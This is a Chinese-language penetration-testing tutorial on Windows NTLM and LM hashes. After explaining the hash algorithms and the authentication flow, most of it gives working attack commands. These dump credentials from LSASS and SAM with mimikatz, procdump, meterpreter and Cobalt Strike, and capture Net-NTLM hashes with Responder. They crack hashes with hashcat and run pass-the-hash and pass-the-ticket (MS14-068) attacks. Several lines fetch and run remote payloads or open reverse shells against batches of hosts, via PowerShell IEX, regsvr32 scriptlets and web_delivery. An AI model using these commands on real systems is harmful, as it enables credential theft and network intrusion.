早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令,我们称之为hash(中文:哈希),Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。
NTLM-Hash与LM-Hash算法相比,明文口令大小写敏感,但无法根据NTLM-Hash判断原始明文口令是否小于8字节,摆脱了魔术字符串KGS!@#$%
。MD4是真正的单向哈希函数,穷举做为数据源出现的明文,难度较大。问题在于,微软一味强调NTLM-Hash的强度高,却避而不谈一个事实,为了保持向后兼容性,NTLM-Hash缺省总是与LM-Hash一起使用的。这意味着NTLM-Hash强调再高也是无助于安全的,相反潜在损害着安全性。增加NTLM-Hash后,首先利用LM-Hash的弱点穷举出原始明文口令的大小写不敏感版本,再利用NTLM-Hash修正出原始明文口令的大小写敏感版本
LM HASH
是一种较古老的Hash,在LAN Manager
协议中使用,非常容易通过暴力破解获取明文凭据。Vista以前的Windows OS使用它,Vista之后的版本默认禁用了LM协议,但某些情况下还是可以使用。
补充:
Windows Vista
和Windows Server 2008
以前的系统还会使用LM hash。LM hash的生成方法本文暂不介绍。自Vista和2008开始,Windows取消LM hash,但某些工具的参数需要填写固定格式LM hash:NT hash
,可以将LM Hash填0(LM hash可以为任意值),即00000000000000000000000000000000:NT hash
NTLM Hash(NT LAN Manager)
是支持Net NTLM
认证协议及本地认证
过程中的一个重要参数。其长度为32位,由数字与字母组成。它的前身是LM Hash
,目前基本淘汰,两者相差不大,只是使用的加密算法不同。
本地认证:Windows不存储用户的明文密码,它会将用户的明文密码经过加密后存储在SAM (Security Account Manager Database,安全账号管理数据库)
中。SAM文件的路径是%SystemRoot%\system32\config\sam
。在进行本地认证的过程中,当用户登录时,系统将用户输入的明文密码加密成NTLM Hash,与SAM数据库中的NTLM Hash进行比较,从而实现认证。
Note:类似的,在域环境下,DC (Domain Controller,域控制器)中也存在这样的数据库
AD (Account Database)
,位于ntds.dit
文件
NTLM是一种网络认证协议,与NTLM Hash的关系就是:NTLM网络认证协议是以NTLM Hash作为根本凭证进行认证的协议。在本地认证的过程中,其实就是将用户输入的密码转换为NTLM Hash与SAM中的NTLM Hash进行比较。
通常意义上的NTLM Hash
指存储在SAM
数据库及NTDS数据库
中对密码进行Hash摘要计算后的结果,这类Hash可以直接用于PTH,并且通常存在于LSASS
进程中,便于SSP使用。
本地认证流程
winlogon.exe -> 接收用户输入 -> lsass.exe -> (认证)
首先,用户注销、重启、锁屏后,操作系统会让winlogon显示登录界面,也就是输入框,�接收输入后,�将密码交给lsass进程,这个进程中会存一份明文密码,将明文密码加密成NTLM Hash,对比SAM数据库中的hash进行验证。
在系统中,hash格式是类似这样的:
ssooking:1001:AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4:::
用户密码为test123
转换成十六进制的格式为74657374313233
转换成Unicode格式为7400650073007400310032003300
对字符串7400650073007400310032003300
以十六进制格式作MD4加密,结果为c5a237b7e9d8e708d8436b6148a25fa1
注:
MD4加密可使用工具HashCalc,如下图
IBM设计的LM Hash算法存在几个弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,NTLM Hash便应运而生。假设明文口令是123456
,首先转换成Unicode
字符串,与LM Hash算法不同,这次不需要添加0补足14字节
123456
-> 310032003300340035003600
。
从
ASCII
串转换成Unicode串时,使用little-endian(小端)
序。0x80之前的标准ASCII码转换成Unicode码,就是简单地从0x??变成 0×00??。此类标准ASCII串按little-endian序转换成Unicode串,就是简单地在原有每个字节之后添加0×00。
对所获取的 Unicode串进行标准MD4单向哈希,无论数据源有多少字节,MD4固定产生128-bit的哈希值,
16字节 310032003300340035003600
- 进行标准MD4单向哈希 -> 32ED87BDB5FDC5E9CBA88547376818D4
,
就得到了最后的NTLM Hash:32ED87BDB5FDC5E9CBA88547376818D4
实验环境下,测试服务器可以先关闭密码复杂性策略,设置一个简单的密码。
gpedit.msc – 本地组策略编辑器 – 计算机配置 - windows设置 - 安全设置 - 帐户策略 - 密码策略
后文以Adminstrator NTML Hash 为例。明文密码为toor
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF:::
NTLM是除Kerberos
之外的一种网络认证协议,只支持Windows。它是一种基于质询/应答 (Challenge/Response)消息交换模式的认证机制, 常用于工作组和域环境下登录场景的身份认证
。
NTML网络认证采用质询/应答 (Challenge/Response) 模式进行数据交换,通过传输加密的Challenge/Response
值并进行对比,从而验证用户身份。NTML网络认证会使用用户密码的Hash作为密钥,来加密Challenge
,用户只有在输对密码的情况下,才能够同样利用密码的hash进行解密。这样通过对比两端的计算结果来判断凭据是否有效,从而实现身份认证。这样的好处是,用户的密码不会在网络链路中传输,加密之后的Challenge值取代原本密码的作用进行对比验证,与传统传输密码的方式相比,具有较高的安全性。
通过交互过程中维护的凭证(credential)
,包括域名、用户名、用户密码的hash串
ps:域名信息会自动在数据包中携带,无需用户手动输入。
NTLM的认证过程分为三步:协商、质询、验证:
NTML的认证方式分为Interactive(交互式)
和Noninteractive(非交互式)
:
交互式验证
:交互式提供必要凭据,通常应用场景通常为登录,即用户要登录某台客户端。
非交互式验证
:无需交互式提供凭据,在实际应用中,比如命令行直接指定用户名、密码的方式登录,再比如我们在客户端上使用net use
命令去映射服务器上某个共享文件夹的方式,这些便属于属于非交互式认证。但非交互式认证的应用场景更多的是已登录某客户端的用户去请求另一台服务器的资源 ,或者为单点登录(SSO)的方式,即用户只需要登录一次即可访问所有相互信任的应用系统及共享资源。
net use x: \\17.10.0.10\$share /u:administrator password
NTML认证机制在工作组
环境下和在域环境
下是不同的。
工作组和域宏观上都是一群计算机的集合,域中计算机的数量规模通常大于工作组内的计算机。在认证体系中,工作组和域的主要区别在于,工作组内的机器名义上虽然是属于一个集合,但是内部各计算机还是各自管理各自的,没有一个相对成熟的信任机制,工作组内各个计算机的关系依旧是点对点
的。因此,在工作组环境下进行访问认证,仅涉及Client和Server。我们使用的个人计算机,默认便处于WORKGROUP工作组环境下。
域是一个有安全边界的计算机集合,同一个域中的计算机通过共同的第三方信任机构
建立信任关系,这个第三方信任机构角色由DC (Domain Controller,域控制器)
担当。通俗来讲,域中的机器都信任域控制器,那么只要域控制器信任我们,我们就可以在域内获得对其他服务器的访问权限。在这种认证体系中涉及三方:Client、Server、DC 。
注意:在Windows域环境下涉及三方的访问认证场景中,即客户端想要访问服务器资源的情况下,采用 基于Kerberos协议的网络认证机制,NTML认证机制参与认证过程。此部分详细内容请参考域渗透之Kerberos 。
下面我们就来分别介绍一下在工作组和域环境下,基于NTML协议的网络认证机制的工作流程。以交互式为例。
工作组中,涉及Clinet、Server,流程如下:
(Net-NTML hash)
发送给服务器。在域环境下多了域控制器的角色,微软给出的说明是这样的:
翻译过来流程大致如下:
(Net-NTML hash)
发送给服务器(Net-NTML hash)
发送给DC (Domain Controller,域控制器)在渗透测试中,通常可从Windows系统中的SAM
文件和域控的NTDS.dit
文件中获得用户hash,通过读取lsass.exe
进程能获得已登录用户的NTLM hash。许多工具能够方便地为我们完成这些工作。但需要注意的是:
大部分这种本地抓取hash的工具都需要管理员权限
常用工具:
quarkspwdump.exe -dhl
privilege::debug
sekurlsa::logonpasswords
更方便的mimikatz命令
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full"
执行以下命令除了回显,还可以dump结果并将hash保存为log日志文件:
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
prodump
是微软提供的一个命令行实用程序,用于监视应用程序并生成故障转储。我们可以用它先dump对方主机的LSASS
内存文件,然后在自己主机用mimikatz
等工具进行处理。这种方式的好处是可以避免被查杀。先转储LSASS
内存文件:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
然后本地用mimikatz
对LSASS
内存文件进行破解:
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonpasswords
类似ProDump
的工具还有:fgdump、pwdump、cachedump等。利用powershell也能够像Prodump
一样转储lsass文件:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
首先需要获取SYSTEM
权限
meterpreter > getuid
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
在metasploit
中利用mimikatz
获取hash
meterpreter > load mimikatz
meterpreter > mimikatz_command -f samdump::hashes
metasploit
提供的抓取hash的一些模块:
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/windows/gather/smart_hashdump
smart_hashdump
模块会把dump的hash文件保存在/root/.msf4/loot
目录下,并且该模块一定程度上能够绕过windows UAC
。
顺便介绍一些能够直接获取明文密码的模块命令:
meterpreter > load mimikatz
meterpreter > wdigest (kerberos)
meterpreter > mimikatz_command -f samdump::hashes
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
meterpreter>load kiwi
meterpreter> creds_wdigest
beacon> getuid
beacon> powershell-import /root/powershell/Get-PassHashes.ps1
beacon> powershell Get-PassHashes
读取hash,需要administer权限(右击目标主机--Access
-hashdump
)
beacon> wdigest //读取信息
beacon> hashdump
运行mimikatz(右击目标主机--Access
- RUN mimikatz
)
beacon> logonpasswords
右击受害者主机--access-hashdump
beacon> powershell-import /root/powershell/Inveigh/Inveigh.ps1
beacon> powershell Invoke-Inveigh -ConsoleOutput Y -FileOutput Y -NBNS Y -mDNS Y -LLMNR Y -HTTP Y -PROXY Y
通常我们采用网络欺骗技术,配合受害者交互的方式窃取到是Net-NTLM Hash。这类hash并不能直接用于pass-the-hash
攻击,但可以通过暴力破解的方式来获取明文密码。关于更多获取Net-NTML HASH
的技巧,可以参考
常用工具:
responder
可以伪造服务,对相关请求进行响应。开启命令:
responder -I eth0
实战环境下,我们应该修改/etc/responder/Responder.conf
配置文件,关闭其中的一些不必要的服务,从而减少网络流量,并产生针对性日志,如:
; Servers to start
SQL = Off
SMB = On
Kerberos = On
FTP = Off
POP = Off
SMTP = Off
IMAP = Off
HTTP = On
HTTPS = On
DNS = On
LDAP = On
针对测试而言,我们还可以设置Challenge
值,以便观察流量格式:
Challenge = 1122334455667788
开启监听后,当用户进行了交互,如在资源管理器中以UNC
路径形式访问伪造的服务器:
此时会弹出虚假认证界面,此时无论受害者是否输入凭据,我们都已经获取了NET NTML Hash
。responder
默认会将日志保存在/usr/share/responder/logs
下,hash记录文件以HTTP-NTLMv2
SMBv2-NTLMv2
等前缀开头。
在渗透测试中,我们还可以通过其他技巧获取Net-NTML Hash
,如:
regsvr32
、powershell
等例:
regsvr32 /s /u /i://17.10.0.1/@abc hello.dll
powershell -c "Invoke-Item \\17.10.0.1\aa"
powershell -nop -exec bypass -c "Invoke-Item \\17.10.0.1\aa"
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
还有许多其他Credential Dumping
姿势,可以参考:
dumping-domain-password-hashes
Places of Interest in Stealing NetNTLM Hashes 及译文 花式窃取NetNTLM哈希的方法
在拿到hash之后,我们一般会考虑破解出hash明文密码,或者利用pass-the-hash
技术在无需明文密码的情况下进行特权操作。
下面是一些提供在线解密的站点:
我们还可以使用john
、hashcat
等工具,通过hash表、字典等进行本地破解。当工具内置的hash字典无法成功破解时,我们可以使用自己搜集的字典文件,或者利用社工等方法针对性生成hash字典。
john HTTP-NTLMv2-17.10.0.10.txt
Hashcat
使用hashcat -h
命令查看帮助,必要的参数有:
-m
hash类型
LM:3000
NTLM:1000
NetNTLMv1:5500
NetNTLMv2:5600
NTLMv1的格式为:
username::hostname:LM response:NTLM response:challenge
构造后的数据如下:
log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee
Hashcat参数如下:
hashcat -m 5500 log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee /tmp/password.list -o found.txt --force
下面,使用Hashcat对该Net-NTLM hash进行破解。NTLMv2的格式为:
username::domain:challenge:HMAC-MD5:blob
值得一提的是,在真实渗透环境下,由于密码复杂度限制,一般我们获取到的
NTML-HASH
很难直接破解出明文密码,这种情况下我们需要采用其他技术继续进行横向渗透。
哈希传递是能够在不需要账户明文密码的情况下完成认证的一个技术。渗透中当我们获取不到明文密码,或者破解不了NTLM Hash的情况下,哈希传递攻击能够使我们利用这些哈希继续进行横向渗透。
常用Pass-The-Hash
工具:
1.安装 crackmapexec
apt-get install crackmapexec
(pip install crackmapexec)
2.使用 crackmapexec
cme smb -h
批量扫描探测命令:
cme smb 17.10.0.10/24
cme smb 17.10.0.10 -u administrator -H hash.txt
cme smb 17.10.0.100-200 -u administrator -H AFC44EE7351D61D00698796DA06B1EBF
执行命令:
cme smb 17.10.0.10 -u administrator -p toor(明文密码) -x whoami
cme smb 17.10.0.10 -u administrator -H afc44ee7351d61d00698796da06b1ebf -x whoami
其他参数
--shares #枚举共享和访问权限
--sessions #枚举活动会话
--disks #枚举磁盘
--sam #dump目标系统中的SAM哈希值
--loggedon-users #枚举登录用户
--users [USER] #枚举域用户(如果指定了用户只查询其信息)
--groups [GROUP] #枚举域组(如果指定了组其成员被列举)
--local-groups [GROUP] #如果指定了组则枚举本地组其成员被列举
--local-groups [GROUP] #枚举本地组,如果指定了组,则枚举其成员
-x COMMAND #执行指定的命令
-X PS_COMMAND #执行指定的PowerShell命令
-L, --list-modules #列出可用的拓展功能模块
--options #查看模块选项
-M MODULE, --module MODULE #使用拓展功能模块
-o MODULE_OPTION [MODULE_OPTION ...] #设置模块选项
GETSHELL
利用拓展功能模块,我们可以方便地getshell。我们可以使用cme smb -L
命令查看所有moudules
,对应的物理路径为:
/usr/local/lib/python2.7/dist-packages/crackmapexec-4.0.1.dev0-py2.7.egg/cme/modules
其中提供的met_inject.py
模块可以使目标下载执行Meterpreter stager
,我们先来看下模块需要的参数:
$ cme smb -M met_inject --options
[*] met_inject module options:
LHOST IP hosting the handler
LPORT Handler port
PAYLOAD Payload to inject: reverse_http or reverse_https (default:reverse_https)
PROCID Process ID to inject into (default: current powershell process)
这是一个http
或https
的反弹shell,我们使用默认的reverse_https
,提供需要的LHOST
和LPORT
的参数即可:
cme smb 17.10.0.10-150 -u administrator -H AFC44EE7351D61D00698796DA06B1EBF -M met_inject -o LHOST=17.10.0.1 LPORT=9999
命令的意思是通过pass-the-hash批量攻击17.10.0.10-17.10.0.150
网段的主机,并使其执行meterpreter的https反弹shell。
笔者测试时遇到问题,无法用met_inject.py
模块正常getshell,不知道什么原因。因此选择直接通过命令执行getlshell。利用metasploit的web_delivery
模块:
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 17.10.0.1
set LPORT 9999
set target 3
run
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 17.10.0.1:9999
[*] Using URL: http://0.0.0.0:8080/1KZkey
[*] Local IP: http://10.204.146.152:8080/1KZkey
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://17.10.0.1:8080/1KZkey.sct scrobj.dll
通过pass-the-hash执行命令批量getshell
cme smb 17.10.0.10-15 -u administrator -H AFC44EE7351D61D00698796DA06B1EBF -x "regsvr32 /s /n /u /i:http://17.10.0.1:8080/1KZkey.sct scrobj.dll"
Metasploit
search psexec
,smblogin
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set RHOST 17.10.0.10
set smbuser administrator
set smbpass AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF
exploit
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/bind_tcp
set RHOST 17.10.0.10
set smbuser administrator
set smbpass AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF
举例:
Mimikatz
先抓取hash
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords""
得到hash之后:
sekurlsa::pth /user:Administrator /domain:ssooking-pc /ntlm:AFC44EE7351D61D00698796DA06B1EBF
exe 版本下载链接
windows 管理规范WMI
,实际上就是windows从03/XP
开始就内置了这个系统插件。其设计初衷之一是为了管理员能更加方便的对远程windows主机进行各种日常管理。
严格来说它其实是为各种服务提供一个统一的调用接口,比如你想操作什么服务就去调用对应的服务类中的方法去执行你的操作。在渗透测试中,它意味着我们可以直接在本地操作远程目标机器上的进程、服务、注册表等包括其它一系列特权操作,wmi是一把在目标内网进行横向移动的非常趁手的武器。wmiexec
是一个python2脚本,对windows自带的wmic做了一些强化,让渗透变得更容易。
只能说很多工具吧,比较好用的在这里介绍两种:
wmiexec的注释中提示"Main advantage here is it runs under the user (has to be Admin) account",经实际测试普通用户权限即可。wmiexec的hash参数格式为LMHASH:NTHASH
,由于该Hash来自于Server 2008,系统默认不支持LM hash,所以LM hash可以设定为任意值。
wmiexec.py -hashes 00000000000000000000000000000000:AFC44EE7351D61D00698796DA06B1EBF ssookinging-pc/administrator@17.10.0.10 "whoami"
Powershell
https://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-WMIExec
Invoke-WMIExec -Target 17.10.0.10 -Domain test.local -Username test1 -Hash AFC44EE7351D61D00698796DA06B1EBF -Command "calc.exe" -verbose
Invoke-SMBExec
通过在目标主机创建服务执行命令,所以权限为system
Invoke-SMBExec -Target 192.168.0.2 -Domain ssookinging-pc -Username test1 -Hash 7ECFFFF0C3548187607A14BAD0F88BB1 -Command "calc.exe" -verbose
Invoke-SMBClient:
支持SMB1, SMB2 (2.1), and SMB signing
如果只有SMB文件共享的权限,没有远程执行权限,可以使用该脚本
支持的功能包括列举目录、上传文件、下载文件、删除文件(具体权限取决于该口令hash的权限)
Invoke-SMBExec -Target 192.168.0.102 -Domain workgroup -Username administrator -Hash 03bebb338e70244589ea67c7439c77ba -Command "notepad.exe" -verbose
kali中自带的横向移动pth的工具,pth-winexe就是其中一个,还有与其类似的:
pth-winexe -U workgroup/administrator%AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF //17.10.0.10 cmd.exe
pth-winexe -U administrator%AAD3B435B51404EEAAD3B435B51404EE:AFC44EE7351D61D00698796DA06B1EBF //17.10.0.11 cmd.exe
Pass-The-Ticket
引用自[原文(http://xnianq.cn/2018/10/16/%E5%9F%9F%E6%B8%97%E9%80%8F%E4%B9%8B%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/
ptt攻击的部分就不是简单的ntlm认证了,它是利用Kerberos协议进行攻击的,这里就介绍三种常见的攻击方法:
之前介绍了Kerberos协议具体工作方法,在域中,简要介绍一下:
这里不得不说walkerfuz表哥写的这篇分析文章:http://www.freebuf.com/vuls/56081.html 最详细的分析,没有之一,向表哥学习!我用最简单的语言表达一下:
windows域中使用kerberos协议过程中,为了让SS服务器判断Client是否有权限访问服务,引入了PAC机制。构造PAC也是这个漏洞的根本。
1. 在请求AS时,将require_PAC设置成False。
2. 在请求TGS时,构造PAC,然后使用MD5签名(PAC尾部的签名算法可以任意指定),PAC并没有放在TGT中发送,而是在请求包的其他位置(但是还是可以解析)。
3. TGS_REP返回的不是会话密钥,而是返回的带PAC的TGT(微软的锅)
利用过程:1.whoami/user 得到普通域用户的sid
2.执行payload生成ccache:
MS14-068.exe -u yifan@test.local -s S-1-5-21-4173655609-916892889-516531421-1108 -d dc-01.test.local -p A100b200
3.使用mimikatz注入凭据:
kerberos::purge #清空当前机器存在的凭证
kerberos::ptc y:\downloads\TGT_yifan@test.local.ccache
显示Injecting ticket : OK就表示注入成功了~
4.查看注入是否成功并且登录域控:
发现已经将凭证注入进去了~下面可以使用net use进行登录,或者使用psexec,wmi等方法进行远程执行命令。注意,这里登录时,要使用机器名,不要使用IP,否则没办法攻击成功。
考虑到mimikatz的pth功能需要本地管理员权限,所以mimikatz也提供了不需要管理员权限的解决方法Pass-The-Ticket。Pass-The-Ticket需要用到gentilkiwi开源的另一款工具kekeo,下载地址。参数实例:
kekeo "tgt::ask /user:test1 /domain:test.local /ntlm:7ECFFFF0C3548187607A14BAD0F88BB1"
执行后生成票据
TGT_test1@TEST.LOCAL_krbtgt~test.local@TEST.LOCAL.kirbi
接下来导入票据:
kekeo "kerberos::ptt TGT_test1@TEST.LOCAL_krbtgt~test.local@TEST.LOCAL.kirbi"
结合攻击方法,总结防御思路如下:检查特殊文件.scf 和 desktop.ini,避免被添加UNC路径 如无特殊需要,建议配置防火墙规则禁止139和445端口
msf> run post/windows/gather/credentials/gpp
参考链接